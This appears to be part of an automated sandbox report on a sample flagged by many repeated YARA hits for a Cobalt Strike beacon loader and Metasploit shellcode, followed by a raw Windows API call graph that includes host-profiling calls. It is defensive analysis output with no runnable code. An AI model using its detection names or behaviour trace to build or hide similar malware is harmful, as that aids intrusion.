                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1787841021.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1787904161.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2672627647.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2303560240.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1942656539.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.2942922670.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2505022354.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2347750483.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2188557331.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1854632916.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1920477423.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2236236442.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2872941960.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:false

                                                                Execution Graph

                                                                Execution Coverage:9.7%
                                                                Dynamic/Decrypted Code Coverage:85.4%
                                                                Signature Coverage:9.2%
                                                                Total number of Nodes:2000
                                                                Total number of Limit Nodes:28
GetSystemTimeAsFileTime __time64 16381->16386 16384 4fc6dcf GetLocalTime 16384->16386 16386->16372 16386->16376 16386->16381 16386->16384 16397 4fc38aa 16386->16397 16954 4fd0f91 16386->16954 16960 4fc5c3f 16386->16960 16971 4fc629c 16386->16971 16979 4fd1038 16386->16979 16986 4fccd89 16386->16986 16996 4fc647c 16386->16996 16999 4fc8aae 16386->16999 17034 4fc9b4c 16386->17034 17048 4fcfb15 16386->17048 17066 4fce190 16386->17066 16387 4fd2f47 163 API calls 16387->16386 16388 4fd2f47 163 API calls 16388->16386 16394 4fc6dcf GetLocalTime 16394->16397 16396 4fc5c3f 78 API calls 16396->16397 16397->16386 16397->16387 16397->16388 16397->16394 16397->16396 17070 4fc857b 16397->17070 17078 4fcb5f5 16397->17078 17084 4fcab3d 16397->17084 17097 4fc6424 16397->17097 17100 4fc5db9 16397->17100 16400 4fcbf5f 66 API calls 16399->16400 16401 4fd0296 _memset 16400->16401 19005 4fd075d 16401->19005 16403 4fd02f9 16404 4fdda1b _malloc 66 API calls 16403->16404 16405 4fd02ff _memset 16404->16405 16406 4fd3b98 71 API calls 16405->16406 16407 4fd0321 16406->16407 19012 4fd0871 16407->19012 16409 4fd0329 16410 4fdda1b _malloc 66 API calls 16409->16410 16411 4fd0334 _memset 16410->16411 16412 4fd3b98 71 API calls 16411->16412 16414 4fd0356 16412->16414 16413 4fd0380 16417 4fd03ec 16413->16417 16418 4fd03ce GetComputerNameExA 16413->16418 16414->16413 16415 4fc6388 71 API calls 16414->16415 16416 4fd0370 htonl 16415->16416 16416->16413 16420 4fd03fd GetComputerNameA 16417->16420 16421 4fd0419 16417->16421 19019 4fd021e 16418->19019 16422 4fd021e 101 API calls 16420->16422 16423 4fd042a GetUserNameA 16421->16423 16425 4fd0449 _memcpy_s 16421->16425 16422->16421 16424 4fd021e 101 API calls 16423->16424 16424->16425 16426 4fd057b 16425->16426 16429 4fcc036 htons 16425->16429 16430 4fcbff3 htonl 16425->16430 16431 4fdda1b _malloc 66 API calls 16425->16431 16432 4fd3b98 71 API calls 16425->16432 16427 4fcbfaa 66 API calls 16426->16427 16428 4fd0583 _memset 16427->16428 16428->16262 
16429->16425 16430->16425 16431->16425 16432->16425 16450 4fdda1b 16433->16450 16435 4fdda1b _malloc 66 API calls 16437 4fc90a4 16435->16437 16436 4fc904d 16436->16435 16436->16436 16438 4fc906e _memcpy_s 16436->16438 16437->16438 16468 4fdd93e 16437->16468 16438->16282 16441 4fc8f40 16440->16441 16443 4fdda1b _malloc 66 API calls 16441->16443 16444 4fc8fc2 _memset _memcpy_s 16441->16444 16442 4fc903a 16442->16292 16446 4fc8f60 _memset 16443->16446 16444->16442 16448 4fdd93e 66 API calls ___wtomb_environ 16444->16448 16446->16444 16818 4fc8edf 16446->16818 16447 4fc8faf _memset 16449 4fdd93e ___wtomb_environ 66 API calls 16447->16449 16448->16444 16449->16444 16451 4fddace 16450->16451 16462 4fdda2d 16450->16462 16452 4fe0f4f __calloc_impl 6 API calls 16451->16452 16453 4fddad4 16452->16453 16455 4fdfe0c __filbuf 65 API calls 16453->16455 16456 4fddac6 16455->16456 16456->16436 16459 4fdda8a RtlAllocateHeap 16459->16462 16460 4fdda3e 16460->16462 16481 4fe0f07 16460->16481 16490 4fe0d5c 16460->16490 16524 4fde061 16460->16524 16462->16456 16462->16459 16462->16460 16463 4fddaba 16462->16463 16466 4fddabf 16462->16466 16527 4fdd9cc 16462->16527 16535 4fe0f4f 16462->16535 16538 4fdfe0c 16463->16538 16467 4fdfe0c __filbuf 65 API calls 16466->16467 16467->16456 16470 4fdd94a __lseeki64 16468->16470 16469 4fdd9c3 __dosmaperr __lseeki64 16469->16438 16470->16469 16471 4fe0075 __lock 64 API calls 16470->16471 16480 4fdd989 16470->16480 16477 4fdd961 ___sbh_find_block 16471->16477 16472 4fdd99e HeapFree 16472->16469 16473 4fdd9b0 16472->16473 16474 4fdfe0c __filbuf 64 API calls 16473->16474 16475 4fdd9b5 GetLastError 16474->16475 16475->16469 16476 4fdd97b 16814 4fdd994 16476->16814 16477->16476 16808 4fe00d8 16477->16808 16480->16469 16480->16472 16541 4fe76f3 16481->16541 16483 4fe0f1b 16485 4fe0d5c __NMSG_WRITE 66 API calls 16483->16485 16488 4fe0f3d 16483->16488 16487 4fe0f33 16485->16487 16486 4fe76f3 __set_error_mode 66 API calls 16486->16483 16489 4fe0d5c 
__NMSG_WRITE 66 API calls 16487->16489 16488->16460 16489->16488 16491 4fe0d70 16490->16491 16492 4fe0ecb 16491->16492 16493 4fe76f3 __set_error_mode 63 API calls 16491->16493 16492->16460 16494 4fe0d92 16493->16494 16495 4fe0ed0 GetStdHandle 16494->16495 16496 4fe76f3 __set_error_mode 63 API calls 16494->16496 16495->16492 16497 4fe0ede _strlen 16495->16497 16498 4fe0da3 16496->16498 16497->16492 16500 4fe0ef7 WriteFile 16497->16500 16498->16495 16499 4fe0db5 16498->16499 16499->16492 16564 4fe768b 16499->16564 16500->16492 16503 4fe0deb GetModuleFileNameA 16505 4fe0e09 16503->16505 16509 4fe0e2c _strlen 16503->16509 16507 4fe768b _strcpy_s 63 API calls 16505->16507 16508 4fe0e19 16507->16508 16508->16509 16511 4fe1ccf __invoke_watson 10 API calls 16508->16511 16510 4fe0e6f 16509->16510 16580 4fe7542 16509->16580 16589 4fe74ce 16510->16589 16511->16509 16515 4fe0e93 16518 4fe74ce _strcat_s 63 API calls 16515->16518 16517 4fe1ccf __invoke_watson 10 API calls 16517->16515 16519 4fe0ea7 16518->16519 16521 4fe0eb8 16519->16521 16522 4fe1ccf __invoke_watson 10 API calls 16519->16522 16520 4fe1ccf __invoke_watson 10 API calls 16520->16510 16598 4fe7365 16521->16598 16522->16521 16649 4fde036 GetModuleHandleW 16524->16649 16528 4fdd9d8 __lseeki64 16527->16528 16531 4fdda09 __lseeki64 16528->16531 16652 4fe0075 16528->16652 16530 4fdd9ee 16659 4fe0887 16530->16659 16531->16462 16536 4fdf3d1 __decode_pointer 6 API calls 16535->16536 16537 4fe0f5f 16536->16537 16537->16462 16727 4fdf5a4 GetLastError 16538->16727 16540 4fdfe11 16540->16466 16542 4fe7702 16541->16542 16543 4fdfe0c __filbuf 66 API calls 16542->16543 16544 4fe0f0e 16542->16544 16545 4fe7725 16543->16545 16544->16483 16544->16486 16547 4fe1df7 16545->16547 16550 4fdf3d1 TlsGetValue 16547->16550 16549 4fe1e07 __invoke_watson 16551 4fdf3e9 16550->16551 16552 4fdf40a GetModuleHandleW 16550->16552 16551->16552 16553 4fdf3f3 TlsGetValue 16551->16553 16554 4fdf41a 16552->16554 16555 4fdf425 GetProcAddress 16552->16555 
16557 4fdf3fe 16553->16557 16560 4fddfdd 16554->16560 16559 4fdf402 16555->16559 16557->16552 16557->16559 16559->16549 16561 4fddfe8 Sleep GetModuleHandleW 16560->16561 16562 4fde00a 16561->16562 16563 4fde006 16561->16563 16562->16555 16562->16559 16563->16561 16563->16562 16565 4fe769c 16564->16565 16567 4fe76a3 16564->16567 16565->16567 16569 4fe76c9 16565->16569 16566 4fdfe0c __filbuf 66 API calls 16568 4fe76a8 16566->16568 16567->16566 16570 4fe1df7 __filbuf 6 API calls 16568->16570 16571 4fe0dd7 16569->16571 16572 4fdfe0c __filbuf 66 API calls 16569->16572 16570->16571 16571->16503 16573 4fe1ccf 16571->16573 16572->16568 16625 4fe5750 16573->16625 16575 4fe1cfc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16576 4fe1dd8 GetCurrentProcess TerminateProcess 16575->16576 16578 4fe1dcc __invoke_watson 16575->16578 16627 4fe555e 16576->16627 16578->16576 16579 4fe0de8 16579->16503 16585 4fe7554 16580->16585 16581 4fe7558 16582 4fdfe0c __filbuf 66 API calls 16581->16582 16583 4fe0e5c 16581->16583 16584 4fe7574 16582->16584 16583->16510 16583->16520 16586 4fe1df7 __filbuf 6 API calls 16584->16586 16585->16581 16585->16583 16587 4fe759e 16585->16587 16586->16583 16587->16583 16588 4fdfe0c __filbuf 66 API calls 16587->16588 16588->16584 16590 4fe74df 16589->16590 16591 4fe74e6 16589->16591 16590->16591 16595 4fe751a 16590->16595 16592 4fdfe0c __filbuf 66 API calls 16591->16592 16597 4fe74eb 16592->16597 16593 4fe1df7 __filbuf 6 API calls 16594 4fe0e82 16593->16594 16594->16515 16594->16517 16595->16594 16596 4fdfe0c __filbuf 66 API calls 16595->16596 16596->16597 16597->16593 16636 4fdf3c8 16598->16636 16601 4fe7388 LoadLibraryA 16602 4fe739d GetProcAddress 16601->16602 16603 4fe74b2 16601->16603 16602->16603 16606 4fe73b3 16602->16606 16603->16492 16604 4fe743a 16608 4fdf3d1 __decode_pointer 6 API calls 16604->16608 16624 4fe7465 16604->16624 16605 4fe7410 16605->16604 16609 4fdf3d1 __decode_pointer 6 API calls 16605->16609 16639 4fdf356 
TlsGetValue 16606->16639 16607 4fdf3d1 __decode_pointer 6 API calls 16607->16603 16618 4fe747d 16608->16618 16611 4fe742d 16609->16611 16613 4fdf3d1 __decode_pointer 6 API calls 16611->16613 16613->16604 16614 4fdf356 __encode_pointer 6 API calls 16615 4fe73ce GetProcAddress 16614->16615 16616 4fdf356 __encode_pointer 6 API calls 16615->16616 16617 4fe73e3 GetProcAddress 16616->16617 16619 4fdf356 __encode_pointer 6 API calls 16617->16619 16621 4fdf3d1 __decode_pointer 6 API calls 16618->16621 16618->16624 16620 4fe73f8 16619->16620 16620->16605 16622 4fe7402 GetProcAddress 16620->16622 16621->16624 16623 4fdf356 __encode_pointer 6 API calls 16622->16623 16623->16605 16624->16607 16626 4fe575c __VEC_memzero 16625->16626 16626->16575 16628 4fe5568 IsDebuggerPresent 16627->16628 16629 4fe5566 16627->16629 16635 4fe7a25 16628->16635 16629->16579 16632 4fe937f SetUnhandledExceptionFilter UnhandledExceptionFilter 16633 4fe939c __invoke_watson 16632->16633 16634 4fe93a4 GetCurrentProcess TerminateProcess 16632->16634 16633->16634 16634->16579 16635->16632 16637 4fdf356 __encode_pointer 6 API calls 16636->16637 16638 4fdf3cf 16637->16638 16638->16601 16638->16605 16640 4fdf38f GetModuleHandleW 16639->16640 16641 4fdf36e 16639->16641 16643 4fdf39f 16640->16643 16644 4fdf3aa GetProcAddress 16640->16644 16641->16640 16642 4fdf378 TlsGetValue 16641->16642 16648 4fdf383 16642->16648 16645 4fddfdd __crt_waiting_on_module_handle 2 API calls 16643->16645 16646 4fdf387 GetProcAddress 16644->16646 16647 4fdf3a5 16645->16647 16646->16614 16647->16644 16647->16646 16648->16640 16648->16646 16650 4fde05a ExitProcess 16649->16650 16651 4fde04a GetProcAddress 16649->16651 16651->16650 16653 4fe009d RtlEnterCriticalSection 16652->16653 16654 4fe008a 16652->16654 16653->16530 16668 4fdffb2 16654->16668 16656 4fe0090 16656->16653 16694 4fde00d 16656->16694 16661 4fe08b5 16659->16661 16660 4fdd9f9 16665 4fdda12 16660->16665 16661->16660 16664 4fe094e 16661->16664 16715 4fe03ee 16661->16715 
16664->16660 16722 4fe049e 16664->16722 16726 4fdff9b RtlLeaveCriticalSection 16665->16726 16667 4fdda19 16667->16531 16669 4fdffbe __lseeki64 16668->16669 16670 4fe0f07 __FF_MSGBANNER 66 API calls 16669->16670 16683 4fdffe4 16669->16683 16671 4fdffd3 16670->16671 16673 4fe0d5c __NMSG_WRITE 66 API calls 16671->16673 16676 4fdffda 16673->16676 16674 4fdffff 16677 4fe0006 16674->16677 16678 4fe0015 16674->16678 16675 4fdfff4 __lseeki64 16675->16656 16679 4fde061 _malloc 3 API calls 16676->16679 16680 4fdfe0c __filbuf 66 API calls 16677->16680 16681 4fe0075 __lock 66 API calls 16678->16681 16679->16683 16680->16675 16682 4fe001c 16681->16682 16684 4fe0024 16682->16684 16685 4fe0050 16682->16685 16683->16675 16701 4fe69cd 16683->16701 16706 4fe3417 16684->16706 16687 4fdd93e ___wtomb_environ 66 API calls 16685->16687 16689 4fe0041 16687->16689 16688 4fe002f 16688->16689 16690 4fdd93e ___wtomb_environ 66 API calls 16688->16690 16710 4fe006c 16689->16710 16692 4fe003b 16690->16692 16693 4fdfe0c __filbuf 66 API calls 16692->16693 16693->16689 16695 4fe0f07 __FF_MSGBANNER 66 API calls 16694->16695 16696 4fde017 16695->16696 16697 4fe0d5c __NMSG_WRITE 66 API calls 16696->16697 16698 4fde01f 16697->16698 16699 4fdf3d1 __decode_pointer 6 API calls 16698->16699 16700 4fde02a 16699->16700 16700->16653 16704 4fe69d6 16701->16704 16702 4fdda1b _malloc 65 API calls 16702->16704 16703 4fe6a0c 16703->16674 16704->16702 16704->16703 16705 4fe69ed Sleep 16704->16705 16705->16704 16713 4fe0b6c 16706->16713 16708 4fe3423 InitializeCriticalSectionAndSpinCount 16709 4fe3467 __lseeki64 16708->16709 16709->16688 16714 4fdff9b RtlLeaveCriticalSection 16710->16714 16712 4fe0073 16712->16675 16713->16708 16714->16712 16716 4fe0435 RtlAllocateHeap 16715->16716 16717 4fe0401 RtlReAllocateHeap 16715->16717 16718 4fe041f 16716->16718 16720 4fe0458 VirtualAlloc 16716->16720 16717->16718 16719 4fe0423 16717->16719 16718->16664 16719->16716 16720->16718 16721 4fe0472 HeapFree 16720->16721 
